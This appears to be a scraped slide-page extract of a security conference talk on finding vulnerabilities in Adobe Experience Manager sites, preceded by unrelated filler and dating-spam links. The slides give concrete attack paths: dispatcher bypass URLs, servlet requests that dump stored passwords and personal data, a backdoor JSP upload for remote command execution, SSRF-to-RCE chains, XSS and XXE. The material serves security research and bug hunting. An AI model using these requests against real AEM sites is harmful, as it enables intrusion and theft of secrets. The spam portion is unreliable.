Similar to Hunting for security bugs in AEM webapps (20)
seo proposal | Kiyado Innovations LLP pdfdiyakiyado
Crafting a compelling SEO proposal? Learn how to structure a winning SEO proposal template with essential elements and tips for client engagement. Elevate your SEO strategy with expert insights and examples
The advent of social media has revolutionized communication, transforming the way people connect, share, and interact globally. At the forefront of this digital revolution are visionary entrepreneurs who recognized the potential of the internet to foster social connections and create communities. This essay explores the founders of some of the most influential social media platforms, their journeys, and the lasting impact they have made on society.
Mark Zuckerberg, along with his college roommates Eduardo Saverin, Andrew McCollum, Dustin Moskovitz, and Chris Hughes, founded Facebook in 2004. Initially created as a social networking site for Harvard University students, Facebook rapidly expanded to other universities and eventually to the general public. Zuckerberg's vision was to create an online directory that connected people through their real-life social networks.
Twitter, founded in 2006 by Jack Dorsey, Biz Stone, and Evan Williams, brought a new dimension to social media with its microblogging platform. Dorsey envisioned a service that allowed users to share short, real-time updates, limited to 140 characters (now 280). This concise format encouraged rapid sharing of information and fostered a culture of brevity and immediacy.
Kevin Systrom and Mike Krieger co-founded Instagram in 2010, focusing on photo and video sharing. Systrom, who studied photography, wanted to create an app that made mobile photos look professional. The app's unique filters and easy-to-use interface quickly gained popularity, amassing over a million users within two months of its launch.
Instagram's emphasis on visual content has had a significant cultural impact. It has popularized the concept of influencers, giving rise to a new industry where individuals can monetize their popularity and reach. The platform has also revolutionized digital marketing, enabling brands to connect with consumers in more authentic and engaging ways. Acquired by Facebook in 2012, Instagram continues to be a dominant force in social media, shaping trends and cultural norms.
Reid Hoffman founded LinkedIn in 2002 with the goal of creating a professional networking platform. Unlike other social media sites focused on personal connections, LinkedIn was designed to connect professionals, facilitate job searches, and foster business relationships. The platform allows users to create professional profiles, network with colleagues, and share industry insights.
LinkedIn has become an indispensable tool for job seekers, recruiters, and businesses. It has transformed the job market by making it easier to find and connect with potential employers and employees. LinkedIn's influence extends beyond job searches; it has become a hub for professional development, thought leadership, and industry news. Hoffman's vision has significantly impacted how professionals manage their careers and build their networks.
Jan Koum and Brian Acton co-founded WhatsApp in 2009, aiming to create a simple, reliable..
Book dating , international dating phgrathomaskurtha9
International dating programhttps: please register here and start to meet new people todayhttps://www.digistore24.com/redir/384521/godtim/.
get started. https://www.digistore24.com/redir/384521/godtim/
Have you ever built a sandcastle at the beach, only to see it crumble when the tide comes in? In the digital world, our information is like that sandcastle, constantly under threat from waves of cyberattacks. A cybersecurity course is like learning to build a fortress for your information!
This course will teach you how to protect yourself from sneaky online characters who might try to steal your passwords, photos, or even mess with your computer. You'll learn about things like:
* **Spotting online traps:** Phishing emails that look real but could steal your info, and websites that might be hiding malware (like tiny digital monsters).
* **Building strong defenses:** Creating powerful passwords and keeping your software up-to-date, like putting a big, strong lock on your digital door.
* **Fighting back (safely):** Learning how to identify and avoid threats, and what to do if something does go wrong.
By the end of this course, you'll be a cybersecurity champion, ready to defend your digital world and keep your information safe and sound!
2. Mikhail Egorov, @0ang3el
• Security researcher
• Bug hunter (Bugcrowd, H1)
• In Top 20 on Bugcrowd
• Conference speaker
• Hack In The Box
• Troopers
• ZeroNights
• PHDays
• https://twitter.com/0ang3el
• https://www.slideshare.net/0ang3el
• https://speakerdeck.com/0ang3el
• https://github.com/0ang3el
3. Why this talk
• AEM is an enterprise-grade CMS
• AEM is widely used by high-profile companies!
3/110
4. Why this talk
Companies that use AEM and has public Bug bounty or Vulnerability disclosure programs
4/110
5. Why this talk
• Using whatruns.com I grabbed 9985 unique domains that use AEM
• 5751 AEM installations were on https://domain-name or
https://www.domain-name
5/110
6. Why this talk
• AEM is big and complex => room for security bugs!
• 26 known CVEs
• Based on open source projects
• Apache Felix
• Apache Sling
• Apache OAK JCR
https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html
6/110
7. Why this talk
• New tools and techniques
• Details for fresh CVEs
7/110
Kudos to Jason Meyer (@zaptechsol)
8. Previous work
• PHDays 2015, @0ang3el
• https://www.slideshare.net/0ang3el/hacking-aem-sites
8/110
9. Previous work
• 2016, @darkarnium
• http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-
Code-Execution-Write-Up.html
9/110
15. AEM Dispatcher
• Module for Web Server (Apache, IIS)
• https://www.adobeaemcloud.com/content/companies/public/adobe/dispatcher/dispatcher.
html
• Provides security (~WAF) and caching layers
15/110
16. AEM Dispatcher
• In theory … a front end system offers an extra layer of security to
your Adobe Experience Manager infrastructure
• In practice … it’s the only security layer!!!
• Admins rarely keep all components on Publish updated and securely
configured
16/110
28. Add multiple slashes
• ///etc.json instead of /etc.json
• ///bin///querybuilder.json instead of /bin/querybuilder.json
28/110
29. Using SSRF
• We need SSRF in a component that is allowed by AEM
dispatcher policy
• Effective way to bypass AEM dispatcher!
29/110
30. Things to remember
• Usually AEM dispatcher is the only security layer
• Usually it’s easy to bypass AEM dispatcher
• AEM admins usually fail to configure Publish instance securely and
install updates timely
…
• Profit!
30/110
37. What we can find
• Everything is stored in JCR repository as node properties
including:
• Secrets (passwords, encryption keys, tokens)
• Configuration
• PII
• Usernames
37/110
39. DefaultGetServlet
• Allows to get JCR node with its props
• Selectors
• tidy
• infinity
• numeric value: -1, 0, 1 … 99999
• Formats
• json
• xml
• res
39/110
40. DefaultGetServlet
• Allows to get JCR node with its props
• Selectors
• tidy
• infinity
• numeric value: -1, 0, 1 … 99999
• Formats
• json
• xml
• res good for retrieving files
40/110
42. DefaultGetServlet – How to grab
• Get node names, start from jcr:root
• /.1.json
• /.ext.json
• /.childrenlist.json
• Or guess node names: /content, /home, /var, /etc
• Dump props for each child node of jcr:root
• /content.json or /content.5.json or /content.-1.json
42/110
43. DefaultGetServlet – What to grab
• Interesting nodes
• /etc – may contain secrets (passwords, enc. keys, …)
• /apps/system/config or /apps/<smth>/config (passwords, …)
• /var – may contain private information (PII)
• /home – password hashes, PII
• Interesting props – contain AEM users names
• jcr:createdBy
• jcr:lastModifiedBy
• cq:LastModifiedBy
43/110
44. P1 submission for private BB program - AEM webapp reveals DB passwords
/apps/<redacted>/config.author.tidy.1..json/a.ico
DefaultGetServlet – In the wild 44/110
45. • We can search JCR using different predicates
• https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-
predicate-reference.html
• QueryBuilderJsonServlet allows to get Nodes and their Props
(DefaultGetServlet on steroids)
• QueryBuilderFeedServlet allows to get Nodes (no Props)
• but we can use blind binary search for Props
QueryBuilder: JsonServlet & FeedServlet 45/110
50. Examples of useful searches
hasPermission=jcr:write&path=/content
P2 submission for Twitter BB – Persistent XSS with CSP bypass
Root cause:
• /content/usergenerated/etc/commerce/smartlists was writable for anon user
• POST servlet was accessible for anon user
50/110
52. Examples of useful searches
path=/etc&path.flat=true&p.nodedepth=0
path=/etc/cloudsettings&p.hits=full&p.nodedepth=-1
/etc.childrenlist.json
/etc/cloudsettings.-1.json
52/110
53. GQLSearchServlet
• GQL is a simple fulltext query language, similar to Lucene or Google
queries
• https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-
materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
• We can get Node names (not Props)
• but we can use blind binary search for Props
53/110
69. Uploading backdoor jsp script
• Create node rcenode somewhere with property
sling:resourceType=rcetype
• Create node /apps/rcetype and upload html.jsp with payload to
node
• Open https://aem-site/rcenode.html?cmd=ifconfig and have LULZ
• https://github.com/0ang3el/aem-hacker/blob/master/aem-rce-sling-script.sh
69/110
77. SSRF in SalesforceSecretServlet
CVE-2018-5006
• Versions: 6.0, 6.1, 6.2, 6.3, 6.4
• Allows to see the response**
• Leak secrets (IAM role creds), RXSS (bypasses XSS filters)
• https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html
/libs/mcm/salesforce/customer.json
** - Servlet makes POST request to URL
77/110
81. SSRF in SiteCatalystServlet
No CVE from Adobe PSIRT
• Allows to blindly send POST requests
• Allow to specify arbitrary HTTP headers via CRLF or LF injection
• HTTP smuggling (works for Jetty)
/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
81/110
84. SSRF in AutoProvisioningServlet
No CVE from Adobe PSIRT
• Allows to blindly send POST requests
• Allow to inject arbitrary HTTP headers
• HTTP smuggling (works for Jetty)
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json
84/110
87. SSRF to RCE
• It’s possible to escalate 2 SSRFs to RCE on Publish server
• Tested on AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack
• https://www.adobeaemcloud.com/content/marketplace/marketplaceProxy.html?pack
agePath=/content/companies/public/adobe/packages/cq620/cumulativefixpack/AEM-
6.2-SP1-CFP7
87/110
88. SSRF to RCE
• Topology is used by replication mechanisms in AEM
• https://sling.apache.org/documentation/bundles/discovery-api-and-impl.html
• https://helpx.adobe.com/experience-manager/kb/HowToUseReverseReplication.html
• To join Topology PUT request must be sent to TopologyConnectorServlet
• TopologyConnectorServlet is accessible on localhost only (default)
• Via SSRF with HTTP smuggling we can access TopologyConnectorServlet
88/110
89. SSRF to RCE
• When node joins the topology Reverse replication agent is created
automatically
• Reverse replication agent replicates nodes from malicious AEM server to
Publish server … RCE!
89/110
92. XSS variants
• Create new node and upload SVG (jcr:write, jcr:addChildNodes)
• Create new node property with XSS payload (jcr:modifyProperties)
• SWF XSSes from @fransrosen
• WCMDebugFilter XSS – CVE-2016-7882
• See Philips XSS case @JonathanBoumanium
• Many servlets return HTML tags in JSON response
92/110
93. XSS variants
• Create new node and upload SVG (jcr:write, jcr:addChildNodes)
• Create new node property with XSS payload (jcr:modifyProperties)
• SWF XSSes from @fransrosen
• WCMDebugFilter XSS – CVE-2016-7882
• See Philips XSS case @JonathanBoumanium
• Many servlets return HTML tags in JSON response
Persistent
93/110
94. • Create new node and upload SVG (jcr:write, jcr:addChildNodes)
• Create new node property with XSS payload (jcr:modifyProperties)
• SWF XSSes from @fransrosen
• WCMDebugFilter XSS – CVE-2016-7882
• See Philips XSS case @JonathanBoumanium
• Many servlets return HTML tags in JSON response
XSS variants
Reflected
94/110
95. XSS variants
• Create new node and upload SVG (jcr:write, jcr:addChildNodes)
• Create new node property with XSS payload (jcr:modifyProperties)
• SWF XSSes from @fransrosen
• WCMDebugFilter XSS – CVE-2016-7882
• See Philips XSS case @JonathanBoumanium
• Many servlets return HTML tags in JSON response
95/110
105. XXE via webdav
• Old bug, CVE-2015-1833
• It’s possible to read local files with PROPFIND/PROPPATCH
• https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-
webdav
105/110
106. XXE via webdav – webdav support is on?
• Send OPTIONS request
• Allow headers in response contain webdav-related methods
• Navigate to /crx/repository/test
• 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV"
106/110